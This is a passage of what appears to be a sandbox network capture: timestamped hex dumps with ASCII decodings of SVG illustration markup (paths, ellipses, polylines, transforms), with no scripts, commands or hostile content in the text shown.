                                                                                                                                                                                                                                                                          Data Ascii: 442.93,157.34a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M442.71,150.86A1.61,1.61,0,0,1,442,153a2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9465INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 33 37 2c 31 38 38 2e 38 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 31 35 2c 31 38 32 2e 33 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                                          Data Ascii: class="cls-9" d="M470.37,188.86a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M470.15,182.38a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9481INData Raw: 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 35 2e 30 38 2c 33 39 2e 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 34 2e 38 36 2c 33 32 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M485.08,39.1a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M484.86,32.62a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9497INData Raw: 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 35 32 2c 37 30 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 33 2c 36 34 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.52,70.62a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.3,64.14a1.61,1.61,0,0,1-.73,2.09,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9513INData Raw: 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2c 31 30 32 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 39 2e 37 34 2c 39 35 2e 36 36 61 31 2e 36 31 2c 31 2e 36
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M540,102.14a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M539.74,95.66a1.61,1.6
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9529INData Raw: 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 36 22 20 64 3d 22 4d 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 33 34 2d 35 2e 36 33 2c 32 2e 34 31 2d 33 30 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39 34 2c 33 2d 39 2e 38 35 2c 36 2e 31 32 2d 31 34 2e 38 34 2c 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 6c 2d 2e 33 39 2c 34 4c 36 31
                                                                                                                                                                                                                                                                          Data Ascii: 9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94Z"/><path class="cls-16" d="M900.16,174l4.34-5.63,2.41-30.26-23.69,14.45c-4.94,3-9.85,6.12-14.84,9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94l-.39,4L61
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9545INData Raw: 2e 34 35 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2d 2e 36 36 41 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 35 32 30 2e 33 34 2c 32 32 39 2e 30 35 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 35 32 34 2c 32 32 36 2e 32 32 71 30 2c 2e 32 31 2c 30 2c 2e 34 38 63 30 2c 2e 31 38 2c 30 2c 2e 33 33 2c 30 2c 2e 34 35 68 30 61 31 2e 36 36 2c 31 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 39 2d 2e 34 32 2c 32 2e 30 36 2c 32 2e 30 36 2c 30 2c 30 2c 31 2c 2e 34 33 2d 2e 33 35 2c 32 2e 33 32 2c 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 35 33 2d 2e 32 34 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2c 2e 36 2d 2e 30 38 2c 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 31 2c 2e 31 39 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                                          Data Ascii: .45,1.94,1.94,0,0,0,.37-.66A2.5,2.5,0,0,0,520.34,229.05Z"/><path class="cls-2" d="M524,226.22q0,.21,0,.48c0,.18,0,.33,0,.45h0a1.66,1.66,0,0,1,.29-.42,2.06,2.06,0,0,1,.43-.35,2.32,2.32,0,0,1,.53-.24,2.35,2.35,0,0,1,.6-.08,2.15,2.15,0,0,1,1,.19,2,2,0,0,1,.6
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9561INData Raw: 79 32 3d 22 33 32 34 2e 32 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 36 22 20 64 3d 22 4d 36 36 39 2e 31 39 2c 33 31 33 2e 33 34 76 32 63 30 2c 31 2e 33 36 2c 33 2e 32 33 2c 32 2e 34 36 2c 37 2e 32 31 2c 32 2e 34 36 73 37 2e 32 31 2d 31 2e 31 2c 37 2e 32 31 2d 32 2e 34 36 76 2d 32 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 36 37 36 2e 34 22 20 63 79 3d 22 33 31 33 2e 33 34 22 20 72 78 3d 22 37 2e 32 31 22 20 72 79 3d 22 32 2e 34 35 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 70 6f 69 6e 74 73 3d 22 36 36 38 2e 31 35 20 33 33 31 2e 34 38 20 36 36 34 2e 37 33 20 33 32 39 2e 31 35 20 36 36 34 2e 39 33 20 33 31 37 2e 37 34 20 36 36 38 2e 34 20 33 31
                                                                                                                                                                                                                                                                          Data Ascii: y2="324.26"/><path class="cls-76" d="M669.19,313.34v2c0,1.36,3.23,2.46,7.21,2.46s7.21-1.1,7.21-2.46v-2"/><ellipse class="cls-38" cx="676.4" cy="313.34" rx="7.21" ry="2.45"/><polygon class="cls-38" points="668.15 331.48 664.73 329.15 664.93 317.74 668.4 31
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9577INData Raw: 20 35 36 38 2e 37 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 32 2e 32 34 22 20 72 79 3d 22 32 2e 38 38 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 31 2e 36 22 20 72 79 3d 22 32 2e 30 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28
                                                                                                                                                                                                                                                                          Data Ascii: 568.75) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="2.24" ry="2.88" transform="translate(45.69 569.88) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="1.6" ry="2.05" transform="translate(45.69 569.88) rotate(
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9593INData Raw: 33 34 63 30 2d 2e 30 35 2d 2e 32 38 2d 2e 32 35 2d 2e 33 32 2d 2e 33 61 2e 33 2e 33 2c 30 2c 30 2c 31 2d 2e 30 39 2d 2e 32 33 2e 33 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 33 33 2d 2e 33 33 43 38 31 35 2e 32 36 2c 32 35 30 2e 31 34 2c 38 31 35 2e 33 34 2c 32 35 30 2e 31 38 2c 38 31 35 2e 36 2c 32 35 30 2e 33 39 5a 6d 31 2e 31 37 2e 34 36 61 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 32 33 2e 36 36 63 30 2c 2e 32 31 2d 2e 32 31 2e 32 38 2d 2e 34 32 2e 32 32 73 2d 2e 31 37 2d 2e 30 38 2d 2e 33 33 2d 2e 34 37 6c 2d 2e 31 36 2d 2e 33 37 61 2e 33 35 2e 33 35 2c 30 2c 30 2c 31 2c 30 2d 2e 31 34 63 30 2d 2e 32 34 2e 32 33 2d 2e 32 36 2e 33 36 2d 2e 32 35 53 38 31 36 2e 36 35 2c 32 35 30 2e 35 39 2c 38 31 36 2e 37 37 2c 32 35 30 2e 38 35 5a 6d 2e 34 35 2e 30
                                                                                                                                                                                                                                                                          Data Ascii: 34c0-.05-.28-.25-.32-.3a.3.3,0,0,1-.09-.23.32.32,0,0,1,.33-.33C815.26,250.14,815.34,250.18,815.6,250.39Zm1.17.46a2.37,2.37,0,0,1,.23.66c0,.21-.21.28-.42.22s-.17-.08-.33-.47l-.16-.37a.35.35,0,0,1,0-.14c0-.24.23-.26.36-.25S816.65,250.59,816.77,250.85Zm.45.0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9609INData Raw: 2c 32 38 34 2e 39 31 5a 22 2f 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 33 22 20 78 3d 22 39 33 30 2e 31 36 22 20 79 3d 22 32 38 35 2e 32 39 22 20 77 69 64 74 68 3d 22 33 2e 37 35 22 20 68 65 69 67 68 74 3d 22 33 2e 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 38 36 34 2e 30 36 20 35 37 33 2e 36 37 29 20 72 6f 74 61 74 65 28 2d 31 38 30 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 34 22 20 64 3d 22 4d 39 33 33 2e 37 32 2c 32 39 35 2e 38 33 61 33 31 2e 37 31 2c 33 31 2e 37 31 2c 30 2c 30 2c 31 2d 36 2e 32 2e 35 31 2c 33 32 2e 34 33 2c 33 32 2e 34 33 2c 30 2c 30 2c 31 2d 36 2e 32 34 2d 2e 35 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 35 22 20 64 3d 22 4d 39 33
                                                                                                                                                                                                                                                                          Data Ascii: ,284.91Z"/><rect class="cls-113" x="930.16" y="285.29" width="3.75" height="3.1" transform="translate(1864.06 573.67) rotate(-180)"/><path class="cls-114" d="M933.72,295.83a31.71,31.71,0,0,1-6.2.51,32.43,32.43,0,0,1-6.24-.51"/><path class="cls-115" d="M93
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9785INData Raw: 30 2c 30 2c 30 2c 2e 37 36 2e 36 2c 36 2e 35 38 2c 36 2e 35 38 2c 30 2c 30 2c 30 2c 32 2e 33 35 2c 31 2e 30 37 2c 37 2e 32 38 2c 37 2e 32 38 2c 30 2c 30 2c 30 2c 32 2e 33 37 2d 2e 30 39 6c 31 2e 38 37 2d 2e 32 37 61 35 2e 32 34 2c 35 2e 32 34 2c 30 2c 30 2c 30 2c 32 2e 35 38 2d 2e 38 35 41 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 30 2c 39 30 35 2e 35 37 2c 32 35 33 2e 35 32 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 33 34 22 20 64 3d 22 4d 38 39 36 2e 39 32 2c 32 34 36 2e 37 33 61 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 37 34 2d 2e 35 35 63 30 2d 2e 34 32 2e 32 37 2d 2e 37 39 2e 32 32 2d 31 2e 32 32 61 36 2e 34 38 2c 36 2e 34 38 2c 30 2c 30 2c 31 2c 32 2e 33 32 2d 2e 30 35 63 2d 2e 35 38 2e 39 34 2e 33 34 2c 32 2e 31 2c
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,0,.76.6,6.58,6.58,0,0,0,2.35,1.07,7.28,7.28,0,0,0,2.37-.09l1.87-.27a5.24,5.24,0,0,0,2.58-.85A2.91,2.91,0,0,0,905.57,253.52Z"/><path class="cls-134" d="M896.92,246.73a2.36,2.36,0,0,1,.74-.55c0-.42.27-.79.22-1.22a6.48,6.48,0,0,1,2.32-.05c-.58.94.34,2.1,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9881INData Raw: 36 37 2c 34 2e 37 36 2e 36 36 2c 37 2e 32 61 31 30 2e 36 34 2c 31 30 2e 36 34 2c 30 2c 30 2c 31 2d 32 2d 2e 31 38 2c 39 2c 39 2c 30 2c 30 2c 31 2d 31 2e 31 33 2d 2e 33 31 63 2d 2e 32 32 2d 2e 30 35 2d 31 2e 32 36 2d 2e 34 35 2d 31 2e 34 35 2d 2e 33 73 2e 31 38 2e 37 2e 33 32 2e 38 39 63 2e 32 36 2e 33 37 2e 33 34 2e 34 36 2e 32 33 2e 39 61 2e 38 33 2e 38 33 2c 30 2c 30 2c 31 2d 2e 35 31 2e 36 38 63 2d 2e 31 33 2e 30 36 2d 2e 38 36 2e 32 32 2d 31 2c 2e 31 33 2c 31 2e 32 34 2c 31 2e 31 39 2c 33 2e 32 36 2c 31 2c 34 2e 38 36 2c 31 2e 32 6c 32 2e 34 33 2e 32 34 63 2e 36 2e 30 36 2c 31 2e 31 37 2e 31 33 2c 31 2e 34 35 2d 2e 35 34 61 33 2e 38 37 2c 33 2e 38 37 2c 30 2c 30 2c 30 2c 2e 31 32 2d 31 2e 33 31 63 30 2d 31 2d 2e 31 36 2d 32 2d 2e 32 2d 33 43 38 32 37
                                                                                                                                                                                                                                                                          Data Ascii: 67,4.76.66,7.2a10.64,10.64,0,0,1-2-.18,9,9,0,0,1-1.13-.31c-.22-.05-1.26-.45-1.45-.3s.18.7.32.89c.26.37.34.46.23.9a.83.83,0,0,1-.51.68c-.13.06-.86.22-1,.13,1.24,1.19,3.26,1,4.86,1.2l2.43.24c.6.06,1.17.13,1.45-.54a3.87,3.87,0,0,0,.12-1.31c0-1-.16-2-.2-3C827
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9897INData Raw: 2d 33 2d 31 33 2e 35 2d 33 6c 2d 33 30 2e 36 39 2d 33 2e 35 37 63 2d 31 2e 32 34 2d 2e 30 38 2d 34 2d 34 2d 34 2e 38 33 2d 34 2e 39 61 34 33 2e 30 37 2c 34 33 2e 30 37 2c 30 2c 30 2c 30 2d 34 2e 31 37 2d 33 2e 39 35 63 2d 32 2e 30 36 2d 31 2e 37 36 2d 33 2e 39 34 2d 33 2e 38 2d 35 2e 38 39 2d 35 2e 36 38 6c 2d 31 30 2d 39 2e 36 34 63 2d 36 2e 33 36 2d 31 2e 35 36 2d 31 32 2e 37 36 2d 33 2d 31 39 2e 31 32 2d 34 2e 35 36 2d 34 2e 33 35 2d 31 2e 30 38 2d 38 2e 37 34 2d 36 2e 31 33 2d 31 32 2e 38 36 2d 37 2e 38 31 2d 31 2e 32 33 2d 35 2e 31 34 2d 31 2e 35 38 2d 39 2d 33 2e 39 35 2d 31 37 2e 34 38 2d 2e 30 36 2d 2e 32 32 2c 31 2e 32 32 2d 39 2c 31 2e 36 38 2d 39 2c 31 32 2e 30 39 2e 31 34 2c 32 31 2c 2e 35 36 2c 33 33 2c 2e 36 35 2c 32 33 2c 2e 31 38 2c 34 35
                                                                                                                                                                                                                                                                          Data Ascii: -3-13.5-3l-30.69-3.57c-1.24-.08-4-4-4.83-4.9a43.07,43.07,0,0,0-4.17-3.95c-2.06-1.76-3.94-3.8-5.89-5.68l-10-9.64c-6.36-1.56-12.76-3-19.12-4.56-4.35-1.08-8.74-6.13-12.86-7.81-1.23-5.14-1.58-9-3.95-17.48-.06-.22,1.22-9,1.68-9,12.09.14,21,.56,33,.65,23,.18,45
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9913INData Raw: 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 37 20 35 36 33 2e 36 34 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 36 39 22 20 63 79 3d 22 32 31 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 36 2e 38 36 20 35 36 33 2e 39 39 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 33 39 2e 30 38 22 20 63 79 3d 22 32 31 34 2e 30 35 22 20 72 78 3d 22 30 2e 31 35 22 20
                                                                                                                                                                                                                                                                          Data Ascii: ry="0.19" transform="translate(47 563.64) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.69" cy="214.09" rx="0.15" ry="0.19" transform="translate(46.86 563.99) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="839.08" cy="214.05" rx="0.15"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9929INData Raw: 63 79 3d 22 32 33 33 2e 36 37 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 37 38 20 35 35 30 2e 37 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 39 38 22 20 63 79 3d 22 32 33 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 36 33 20 35 35 31 2e 31 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 33 2e 34
                                                                                                                                                                                                                                                                          Data Ascii: cy="233.67" rx="0.17" ry="0.22" transform="translate(28.78 550.76) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.98" cy="234.09" rx="0.17" ry="0.22" transform="translate(28.63 551.15) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="813.4
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9945INData Raw: 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 38 30 38 2e 38 35 2c 32 38 31 2e 37 37 61 31 2e 38 35 2c 31 2e 38 35 2c 30 2c 30 2c 31 2c 2e 31 31 2d 2e 33 31 63 2d 2e 33 31 2e 36 37 2d 31 2c 31 2d 31 2e 30 39 2c 31 2e 37 38 61 31 31 2c 31 31 2c 30 2c 30 2c 30 2d 2e 31 35 2c 31 2e 31 35 63 30 2c 2e 34 34 2e 32 2e 36 32 2e 33 31 2c 31 2c 2e 32 32 2e 37 34 2d 2e 31 37 2c 31 2e 37 35 2d 31 2e 30 37 2c 31 2e 34 35 2d 2e 36 39 2d 2e 32 33 2d 31 2e 31 2d 31 2d 31 2e 36 2d 31 2e 34 35 61 31 31 2e 37 36 2c 31 31 2e 37 36 2c 30 2c 30 2c 31 2d 31 2e 38 39 2d 31 2e 37 37 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M808.85,281.77a1.85,1.85,0,0,1,.11-.31c-.31.67-1,1-1.09,1.78a11,11,0,0,0-.15,1.15c0,.44.2.62.31,1,.22.74-.17,1.75-1.07,1.45-.69-.23-1.1-1-1.6-1.45a11.76,11.76,0,0,1-1.89-1.77,2.39,2.39,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9961INData Raw: 35 2e 36 36 20 35 39 38 2e 34 35 20 32 32 31 2e 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 39 2e 35 34 20 32 31 31 2e 31 32 20 35 39 32 2e 36 35 20 32 31 36 2e 32 33 20 35 39 39 2e 32 20 32 32 30 2e 32 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 33 35 2e 32 32 20 35 39 30 2e 35 20 32 33 39 2e 35 34 20 35 39 37 2e 38 31 20 32 33 36 2e 33 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 33 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 35 30 2e 33 31 20 35 39 30 2e 35 20 32
                                                                                                                                                                                                                                                                          Data Ascii: 5.66 598.45 221.7"></polyline><polyline class="cls-52" points="579.54 211.12 592.65 216.23 599.2 220.2"></polyline><polyline class="cls-52" points="577.82 235.22 590.5 239.54 597.81 236.37"></polyline><polyline class="cls-53" points="577.82 250.31 590.5 2
